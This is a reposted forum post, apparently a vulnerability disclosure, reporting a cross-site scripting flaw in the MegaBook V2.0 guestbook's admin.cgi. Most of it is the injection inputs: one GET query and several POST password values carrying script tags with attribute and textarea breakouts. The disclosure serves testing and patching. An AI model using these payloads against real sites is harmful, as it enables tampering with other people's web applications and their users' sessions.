[转载]MegaBook V2.0跨站脚本漏洞测试方法
文章作者:SpyHatThe ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site
Scripting, which will allow the attacker to modify the post in the guestbook. The
affected scripts is admin.cgi
URL: (_blank>[url]http://www.[/url](yourdomain).com/(yourcgidir)/admin.cgi)
I have tested the script with the following query:
?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script>
I have also tested the script with theses POST variables:
action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script>
action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-
486624156');</script>
action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-
1852691616');</script>
action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script>
action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-
string-723975367');</script>
页:
[1]